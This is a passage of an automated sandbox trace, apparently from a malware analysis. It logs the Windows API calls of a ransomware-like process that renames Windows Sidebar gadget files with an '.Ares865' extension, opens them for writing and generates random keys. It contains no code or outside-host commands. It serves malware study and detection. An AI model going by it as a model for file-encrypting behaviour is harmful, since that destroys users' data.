(x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\settings.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\settings.css.ares865"), dwFlags=0x1) returned 1 [0119.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\settings.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.554] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1374) returned 1 [0119.554] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.555] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.555] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.569] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.570] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.570] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.570] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget" [0119.571] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.Ares865") returned 79 [0119.571] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0119.573] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.573] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6772) returned 1 [0119.573] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.574] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.574] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.576] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.577] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.577] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.578] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.Ares865") returned 79 [0119.578] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0119.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.579] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3347) returned 1 [0119.580] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.580] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.580] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.582] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.583] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.583] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.Ares865") returned 79 [0119.584] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0119.585] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6166) returned 1 [0119.586] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.592] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.592] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.592] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.593] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images" [0119.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.Ares865") returned 89 [0119.593] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.ares865"), dwFlags=0x1) returned 1 [0119.595] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.596] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1702) returned 1 [0119.596] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.597] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.597] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.599] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.605] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.605] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.Ares865") returned 89 [0119.605] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.ares865"), dwFlags=0x1) returned 1 [0119.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.621] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1367) returned 1 [0119.621] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.630] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.631] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.631] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.632] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.Ares865") returned 90 [0119.632] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.ares865"), dwFlags=0x1) returned 1 [0119.637] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.637] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1174) returned 1 [0119.637] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.638] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.638] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.644] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.644] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.645] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.Ares865") returned 95 [0119.645] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.ares865"), dwFlags=0x1) returned 1 [0119.647] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.647] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=201) returned 1 [0119.647] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.648] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.648] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.651] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.653] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.653] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.Ares865") returned 92 [0119.654] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png.ares865"), dwFlags=0x1) returned 1 [0119.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=413) returned 1 [0119.656] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.657] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.657] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.662] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.663] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.663] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.664] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.Ares865") returned 91 [0119.664] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png.ares865"), dwFlags=0x1) returned 1 [0119.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.665] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=578) returned 1 [0119.665] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.666] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.666] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.669] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.669] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.669] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.670] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.Ares865") returned 87 [0119.670] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png.ares865"), dwFlags=0x1) returned 1 [0119.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.672] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=203) returned 1 [0119.672] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.673] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.673] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.677] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.678] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.Ares865") returned 95 [0119.679] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png.ares865"), dwFlags=0x1) returned 1 [0119.680] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.680] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0119.680] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.681] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.681] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.684] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.685] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.Ares865") returned 92 [0119.685] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png.ares865"), dwFlags=0x1) returned 1 [0119.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.687] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=409) returned 1 [0119.688] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.691] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.692] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.Ares865") returned 91 [0119.692] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.ares865"), dwFlags=0x1) returned 1 [0119.694] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 